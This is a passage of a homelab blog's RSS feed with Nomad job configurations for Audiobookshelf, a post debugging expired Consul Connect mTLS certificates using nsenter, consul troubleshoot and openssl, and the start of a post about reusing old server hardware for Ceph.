</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.audiobookshelf.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">audio</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http&#34;</span>
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        path     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/healthcheck&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;3s&#34;</span>
</span></span><span style="display:flex;"><span>        port     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;health&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">volume</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span> {
</span></span><span style="display:flex;"><span>      type            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;csi&#34;</span>
</span></span><span style="display:flex;"><span>      source          <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>      attachment_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file-system&#34;</span>
</span></span><span style="display:flex;"><span>      access_mode     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;single-node-writer&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;audiobookshelf&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ghcr.io/advplyr/audiobookshelf:2.2.18&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">volume_mount</span> {
</span></span><span style="display:flex;"><span>        volume      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/hn-data&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">env</span> {
</span></span><span style="display:flex;"><span>        CONFIG_PATH <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/hn-data/config&#34;</span>
</span></span><span style="display:flex;"><span>        METADATA_PATH <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/hn-data/metadata&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>        memory_max <span style="color:#f92672">=</span> <span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Nothing particularly notable in most of the config.
The container listens on port <code>80</code> by default.
I&rsquo;m mounting the RBD volume under <code>hn-data</code> and set the <code>metadata</code> and <code>config</code>
paths under that mount.</p>
<p>The volume was created via Nomad with this file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#75715e"># 0000-5555-fake-id
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;csi&#34;</span>
</span></span><span style="display:flex;"><span>plugin_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ceph-csi-rbd&#34;</span>
</span></span><span style="display:flex;"><span>capacity_max <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;100G&#34;</span>
</span></span><span style="display:flex;"><span>capacity_min <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;100G&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">capability</span> {
</span></span><span style="display:flex;"><span>  access_mode     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;single-node-writer&#34;</span>
</span></span><span style="display:flex;"><span>  attachment_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file-system&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">mount_options</span> {
</span></span><span style="display:flex;"><span>  fs_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ext4&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">secrets</span> {
</span></span><span style="display:flex;"><span>  userID  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;mine-id&#34;</span>
</span></span><span style="display:flex;"><span>  userKey <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;really not that interesting&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">context</span> {
</span></span><span style="display:flex;"><span>  clusterID <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;useless-string-of-numbers-and-letters&#34;</span>
</span></span><span style="display:flex;"><span>  pool <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;homenet-base-bulk&#34;</span>
</span></span><span style="display:flex;"><span>  imageFeatures <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;layering,exclusive-lock,fast-diff,object-map&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I definitely need to finish my &ldquo;Homelab setup&rdquo; series and finally get to the
Nomad and Consul parts, so I have something to link here to explain all the
boilerplate.</p>
<p>The only notable thing here is the <code>memory_max</code> config, which grants the
container up to 4 GB of memory. This memory max is where the Linux OOM killer
gets active, while <code>memory</code> is what Nomad bases its scheduling on. Under normal
operation, ABS runs fine with 400 MB. Although it does take as much memory as
it can get. But when uploading an audiobook, the memory consumption jumps very
high. I&rsquo;m not sure why that is. During ingestion of e.g. Ken Follet&rsquo;s
<em>Winter of the World</em>, a 31h, 865 MB tome, the consumption jumps straight to
2.5 GB - and seems to stay there. I have not run into any problems with 4 GB
yet.</p>
<p>No idea what ABS is doing there, really - they can&rsquo;t just blindly load the
file into memory, right? And even if - the book is just 800 MB.</p>
<p>That&rsquo;s it for today. I think I like this format of not only describing my app
setup, but also giving a little review.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Consul Connect certificate problems</title>
      <link>https://blog.mei-home.net/posts/consul-mesh-problem/</link>
      <pubDate>Sun, 02 Apr 2023 17:13:30 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/consul-mesh-problem/</guid>
      <description>When the cluster goes down every 72 hours...</description>
      <content:encoded><![CDATA[<p>I updated my Nomad and Consul clusters recently. Especially Consul was a
large jump, getting from 1.13.5 to 1.15.1. After about three days, I suddenly
started getting <code>500: Internal server error</code> from a lot of my services.
In this article, I will be going into the debugging process and explain a little
bit about what Consul Connect is and how it works.</p>
<h2 id="why-consul-connect">Why Consul Connect?</h2>
<p>So <a href="https://developer.hashicorp.com/consul/docs/connect">Consul Connect</a>, or
<em>Consul Service Mesh</em>, creates a sort-of overlay network to connect services
running on multiple machines, in a secure manner.</p>
<figure>
    <img loading="lazy" src="mesh-overview.svg"
         alt="A diagram of a Consul connect service. A cloud sits at the top of the diagram, titled &#39;The Network&#39;. In a large box titled &#39;Machine A&#39;, several smaller boxes are shown. An elongated box at the bottom reads &#39;Network namespace of service FOO&#39;. Connected to it is a shape labeled &#39;FOO Container&#39;, which does not have any connection to &#39;The Network&#39;, but only to the network namespace box. Besides it is an Envoy Proxy logo. It is connected to the local network namespace, and to &#39;The Network&#39;, noting that it forwards incoming connections to the socket of the FOO service in the local network namespace. Another Envoy proxy is shown next to it, also connected to &#39;The Network&#39; and the local namespaces, denoted as listening for connections to BAR."/> 
</figure>

<p>How it works is like this: Every service (in my case Nomad jobs, but it also
works standalone) gets a sidecar running <a href="https://www.envoyproxy.io/">Envoy proxy</a>.
Each service gets its own network namespace, which is the only network the service
container is connected to.</p>
<p>There are multiple Envoy proxy sidecars. One of them is always present in
a Mesh enabled service: The Envoy proxy allowing connections from the outside.
But this proxy does not just allow any connection. Instead, it is protected with
mTLS certificates. Those certificates are handed out by the Consul cluster.
Without a fitting mTLS certificate, an incoming connection will be rejected.</p>
<p>Whether a TLS cert is actually valid, and a connection is allowed to a service&rsquo;s
proxy, is defined by Consul intentions. Those allow or deny connections between
services, based on service names.</p>
<p>So let&rsquo;s say we have a service FOO, which wants to connect to service BAR. In
this case, in Nomad, an <em>upstream</em> would be defined. This upstream will mean
that Consul will configure the local Envoy proxy for the service with the IP and
port of the Envoy proxy fronting the BAR service. In addition, the local port
that BAR should be reachable on needs to be defined.</p>
<p>Then, the Envoy proxy will open a socket on the given port in the local service
network namespace and wait for connections. Once a connection is made, the data
is encrypted with mTLS certificates and forwarded to BAR&rsquo;s Envoy. There, it is
decrypted and then forwarded to the local port on which BAR is listening in
its local network namespace.</p>
<p>This shows the three advantages of using Consul Connect service mesh:</p>
<ol>
<li>Connections are automatically encrypted - without having to configure TLS
certs for every service.</li>
<li>Consul&rsquo;s service discovery is used, so no hardcoded IPs or ports are needed.</li>
<li>You don&rsquo;t just have your service&rsquo;s ports dangling openly in your LAN.
Only connections from services which are allowed as per the configured Consul
intentions are allowed through, as the connection is not made to the service
directly, but to its Envoy proxy.</li>
</ol>
<p>And the complexity of setting this up is not too high, at least after the
initial setup. For example, my service config in the Nomad job file for Nextcloud
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-HCL" data-lang="HCL"><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;health&#34;</span> {
</span></span><span style="display:flex;"><span>        host_network <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>        to           <span style="color:#f92672">=</span> <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;nextcloud&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">proxy</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">upstreams</span> {
</span></span><span style="display:flex;"><span>              destination_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;redis&#34;</span>
</span></span><span style="display:flex;"><span>              local_bind_port <span style="color:#f92672">=</span> <span style="color:#ae81ff">6379</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">upstreams</span> {
</span></span><span style="display:flex;"><span>              destination_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>              local_bind_port <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.consulcatalog.connect<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.nextcloud.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">foobar</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.nextcloud.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">my</span>.<span style="color:#66d9ef">very</span>.<span style="color:#66d9ef">own</span>.<span style="color:#66d9ef">cloud</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http&#34;</span>
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        path     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2s&#34;</span>
</span></span><span style="display:flex;"><span>        port     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;health&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>Nextcloud has two upstream dependencies, Redis for caching and Postgres for the
database. They are bound to their default ports, but only in the job group&rsquo;s
own namespace. So Nextcloud will just be configured to connect to Redis under
<code>localhost:6379</code> and to Postgres under <code>localhost:5577</code>. The Envoy proxy then
takes care of forwarding any connections to the Envoy proxies of these two
services.</p>
<p>Another very nice thing is that Traefik already supports Consul Connect natively.
So it doesn&rsquo;t even need an Envoy proxy. It automatically discovers all
services in the mesh, checks whether they have the <code>traefik.enable=true</code> tag
and then uses the other <code>traefik.*</code> tags to automatically set up routes.</p>
<p>But it&rsquo;s not all Milk and Honey. As you can see, some acrobatics are needed for
health checks to work. This is due to the fact that with a config like this,
the only possible connection to the outside is via the Envoy proxy - and that
only allows connections with the right mTLS client cert. But the local Consul
agent needs to be able to connect to the service somehow, to make sure it works.
I do this by forwarding the service&rsquo;s port to a localhost port and running the
health check on that, which works reasonably well.</p>
<p>In addition, Envoy is mostly intended for Layer 7 proxying. As you can see in
the example above, it does work with TCP as well - but it fails with TLS. So
if I were to enable TLS connections in Postgres and Redis, it won&rsquo;t work anymore.</p>
<p>There is a somewhat similar problem with Traefik. It currently has a bug where
it does not use the right certificates to talk to backend services via the mesh,
if the incoming connection is pure TLS, instead of HTTPS.</p>
<h2 id="the-bug">The bug</h2>
<p>Now finally onto what the main part of this post was supposed to be about&hellip;</p>
<p>As mentioned above, the communication, both for encryption and for authorization,
is done via mTLS in the Consul Connect mesh. Those mTLS certs have a TTL of 72h
by default. After that, Consul is supposed to automatically renew them.</p>
<p>But it doesn&rsquo;t, in Consul v1.15.1.</p>
<p>At first, I had no idea what&rsquo;s going on - I was suddenly getting HTTP error code
500 almost everywhere. The health
checks were almost all green. No errors in the logs anywhere. I later realized
that this was partially due to the fact that my health checks bypass the mesh
and run on a local port, as shown above.</p>
<p>When it happened a second time, I realized that it was exactly 72 hours after
I had last restarted all of my services. So I opened <a href="https://github.com/hashicorp/consul/issues/16779">this GitHub issue</a>, and the debugging started.</p>
<p>First, I used Consul&rsquo;s own troubleshooting functionality, with the aptly named
<a href="https://developer.hashicorp.com/consul/commands/troubleshoot">troubleshoot</a>
command.</p>
<p>This command, at least in the setup I have with separate network namespaces in
Nomad jobs, needed to be run in the service container&rsquo;s namespace. Linux has a
handy tool to execute host binaries in a namespace&rsquo;s context. This is the
<code>nsenter</code> command.</p>
<p>To use it, first list your docker containers with <code>docker ps</code> and note the
<em>Container ID</em> of the container you want to enter. Then, you need the PID of
said container, which you can get with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>docker inspect -f <span style="color:#e6db74">&#39;{{.State.Pid}}&#39;</span> &lt;CONTAINER_ID&gt;
</span></span></code></pre></div><p>Then, you can run the actual troubleshooting command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nsenter -t PID -n consul troubleshoot proxy -envoy-admin-endpoint<span style="color:#f92672">=</span>&lt;ENVOY_ADMIN_ADDR&gt; -upstream-ip<span style="color:#f92672">=</span>127.0.0.1
</span></span></code></pre></div><p>The <code>ENVOY_ADMIN_ADDR</code> is the IP and port of the Envoy proxy&rsquo;s admin endpoint
for the service.
You can see it for example by running <code>ss -tulnp</code> in the service&rsquo;s network
namespace:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nsenter -t <span style="color:#ae81ff">1182230</span> -n ss -tulnp
</span></span><span style="display:flex;"><span>Netid          State           Recv-Q           Send-Q                     Local Address:Port                      Peer Address:Port          Process                                                                                         
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                           127.0.0.1:5577                           0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181034,fd<span style="color:#f92672">=</span>26<span style="color:#f92672">))</span>                                                            
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                           127.0.0.1:6379                           0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181034,fd<span style="color:#f92672">=</span>25<span style="color:#f92672">))</span>                                                            
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">1024</span>                             0.0.0.0:3000                           0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;ruby&#34;</span>,pid<span style="color:#f92672">=</span>1182550,fd<span style="color:#f92672">=</span>5<span style="color:#f92672">)</span>,<span style="color:#f92672">(</span><span style="color:#e6db74">&#34;ruby&#34;</span>,pid<span style="color:#f92672">=</span>1182542,fd<span style="color:#f92672">=</span>5<span style="color:#f92672">)</span>,<span style="color:#f92672">(</span><span style="color:#e6db74">&#34;ruby&#34;</span>,pid<span style="color:#f92672">=</span>1182256,fd<span style="color:#f92672">=</span>5<span style="color:#f92672">))</span>          
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                           127.0.0.2:19003                          0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181034,fd<span style="color:#f92672">=</span>14<span style="color:#f92672">))</span>                                                            
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                           127.0.0.2:19004                          0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181041,fd<span style="color:#f92672">=</span>14<span style="color:#f92672">))</span>                                                            
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">511</span>                              0.0.0.0:4000                           0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;node&#34;</span>,pid<span style="color:#f92672">=</span>1182257,fd<span style="color:#f92672">=</span>21<span style="color:#f92672">))</span>                                                             
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                             0.0.0.0:20226                          0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181041,fd<span style="color:#f92672">=</span>33<span style="color:#f92672">)</span>,<span style="color:#f92672">(</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181041,fd<span style="color:#f92672">=</span>24<span style="color:#f92672">))</span>                                
</span></span></code></pre></div><p>This output is an example from my Mastodon Sidekiq container. It shows multiple
envoy processes, e.g. the upstreams supplying Redis and Postgres connectivity.
The admin ports for the Envoy instances are the ports starting with <code>19xxx</code>.</p>
<p>So for inspecting the Envoy proxy running under <code>127.0.0.2:19003</code>, I would enter
the following:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nsenter -t <span style="color:#ae81ff">1182230</span> -n consul troubleshoot proxy -envoy-admin-endpoint<span style="color:#f92672">=</span>127.0.0.2:19003 -upstream-ip<span style="color:#f92672">=</span>127.0.0.1
</span></span></code></pre></div><p>This will show certificate errors, like this one:</p>
<pre tabindex="0"><code>==&gt; Validation                                             
 ! Certificate chain is expired
  -&gt; Check the logs of the Consul agent configuring the local proxy and ensure XDS updates are being sent to the proxy
 ! Certificate chain is expired
  -&gt; Check the logs of the Consul agent configuring the local proxy and ensure XDS updates are being sent to the proxy
 ! Certificate chain is expired
  -&gt; Check the logs of the Consul agent configuring the local proxy and ensure XDS updates are being sent to the proxy
 ✓ Envoy has 0 rejected configurations
 ✓ Envoy has detected 1464 connection failure(s)
 ! No listener for upstream &#34;127.0.0.1&#34; 
  -&gt; Check that your upstream service is registered with Consul
  -&gt; Make sure your upstream exists by running the `consul[-k8s] troubleshoot upstreams` command
  -&gt; If you are using transparent proxy for this upstream, ensure you have set up allow intentions to the upstream
  -&gt; Check the logs of the Consul agent configuring the local proxy to ensure XDS resources were sent by Consul
 ! No clusters found on route or listener
</code></pre><p>Another interesting thing you can do is to check the certs directly with OpenSSL.
For this, you need a service&rsquo;s outside listening port from Consul. Then you can
run:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>openssl s_client -showcerts -connect &lt;ADDR&gt;
</span></span></code></pre></div><p>This will produce an output similar to this:</p>
<pre tabindex="0"><code>CONNECTED(00000003)
Can&#39;t use SSL_get_servername
depth=0 
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 
verify return:1
---
Certificate chain
 0 s:
   i:CN = REDACTED.consul
   a:PKEY: id-ecPublicKey, 256 (bit); sigalg: RSA-SHA256
   v:NotBefore: Mar 31 19:56:43 2023 GMT; NotAfter: Apr  3 19:56:43 2023 GMT
-----BEGIN CERTIFICATE-----
REDACTED
-----END CERTIFICATE-----
---
Server certificate
subject=
issuer=CN = REDACTED.consul
---
Acceptable client certificate CA names
CN = REDACTED.consul
Requested Signature Algorithms: ECDSA+SHA256:RSA-PSS+SHA256:RSA+SHA256:ECDSA+SHA384:RSA-PSS+SHA384:RSA+SHA384:RSA-PSS+SHA512:RSA+SHA512:RSA+SHA1
Shared Requested Signature Algorithms: ECDSA+SHA256:RSA-PSS+SHA256:RSA+SHA256:ECDSA+SHA384:RSA-PSS+SHA384:RSA+SHA384:RSA-PSS+SHA512:RSA+SHA512
Peer signing digest: SHA256
Peer signature type: ECDSA
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1392 bytes and written 403 bytes
Verification error: unable to verify the first certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 256 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 21 (unable to verify the first certificate)
---
4097EA98687F0000:error:0A00045C:SSL routines:ssl3_read_bytes:tlsv13 alert certificate required:../ssl/record/rec_layer_s3.c:1584:SSL alert number 116
</code></pre><p>The interesting line is this one:</p>
<pre tabindex="0"><code>v:NotBefore: Mar 31 19:56:43 2023 GMT; NotAfter: Apr  3 19:56:43 2023 GMT
</code></pre><p>It shows the cert&rsquo;s expiration date.</p>
<p>After some investigation in the ticket, it turns out that it wasn&rsquo;t just me, but
that a recent change in local caching behavior had prevented automatic renewals
from being communicated to the Envoy proxies.</p>
<p>Which yet again proves: Caching is one of the two hard things in software
engineering. The other two being &ldquo;naming things&rdquo; and &ldquo;off by one errors&rdquo;.</p>
<p>Luckily, the issue seems to have been found, and a new version, 1.15.2 has been
released on Friday.</p>
<p>I immediately did the update, and found something nice: This time around, I did
not stop all Nomad jobs in the cluster, but instead just updated the Consul version.
And it worked without issue. So I will be able to do future Consul agent updates
without full job restarts.</p>
<p>After the update, all services got new certificates. I&rsquo;m not sure whether that&rsquo;s
an indication that the update fixed the issue, or whether they just got the new
certs due to the Consul restart.</p>
<p>At the time of writing, the expiration date for the certs is tomorrow, April 3rd.</p>
<p>Let&rsquo;s see what happens.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Reduce, Reuse, Recycle: Reusing my old home server</title>
      <link>https://blog.mei-home.net/posts/reuse-old-homelab/</link>
      <pubDate>Wed, 29 Mar 2023 00:51:12 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/reuse-old-homelab/</guid>
      <description>Re-purposing older Hardware for a Ceph node in my Homelab</description>
      <content:encoded><![CDATA[<p>I had a random thought today, triggered, by all things, by a short training on
<em>Reduce, Reuse, Recycle</em> at work. This is the principle of first looking for
the potential to not produce anything. Then to look for a new use for something
old that has already been manufactured. And only then, as a final step, to
recycle the thing.</p>
<p>I, and probably many other Homelabbers, have quite a bit of older hardware laying
around. Hardware that&rsquo;s still perfectly functional, but which is either too slow,
or doesn&rsquo;t support newer features etc. For me, that&rsquo;s only two things, because
I was a poor student until relatively recently. &#x1f609;. The first one not
discussed here is a desktop from 2017 which I replaced in 2019. It is an AMD
Ryzen 1700x. Still a powerful machine, but quite honestly: A bit more powerful
and <strong>power hungry</strong> than my new <em>many small and less powerful machines</em> Homelab
principle calls for.</p>
<p>The second complete machine is my old homeserver, build in early 2018 and
replaced in early 2021. It has the following primary hardware:</p>
<ul>
<li><a href="https://www.amd.com/en/support/apu/amd-series-processors/amd-a10-series-apu-for-desktops/7th-gen-a10-9700e-apu">AMD A10-9700E</a>
This APU has four physical cores and four threads. It is that generations low
power desktop CPU, with a TDP of 35W.</li>
<li><a href="https://www.msi.com/Motherboard/A320M-PRO-VD-S/">MSI A320M PRO VD/S</a> I mostly
got this mainboard because it was cheap at the time. It boasts two RAM slots,
Dual Channel and four SATA ports and supports a maximum of 64GB of RAM (see below)</li>
<li>Corsair VS350: I would have loved to link to this power supply, but the corsair
website told me I was blocked for security reasons&hellip;?</li>
</ul>
<p>Let&rsquo;s start with a short comment on the mainboard. It states that it supports
a max of 32 GB of RAM on the German website, but claims 64 GB max on the English
version. Weird.</p>
<p>The machine currently looks like this:</p>
<figure>
    <img loading="lazy" src="old-homeserver.jpg"
         alt="A picture of an open PC case. In it are two chambers. The lower one contains a power supply alongside a nest of cables. The model Corsair VS350 is noted on the side of the PSU. In the upper chamber is a brown mainboard, topped by a horizontal, low profile cooler in the proud brown and beige colors of Noctua."/> 
</figure>

<p>So how to reuse this somewhat older hardware? Both the mainboard and the CPU are
still alright. My use case for the system would be as a Ceph storage cluster
node. If you&rsquo;re interested in my storage setup, I&rsquo;ve written about Ceph and my
specific setup <a href="https://blog.mei-home.net/posts/homelab-2022/storage/">here</a>. My current
goal is splitting my Homelab into many smaller machines, mostly Raspberry Pis,
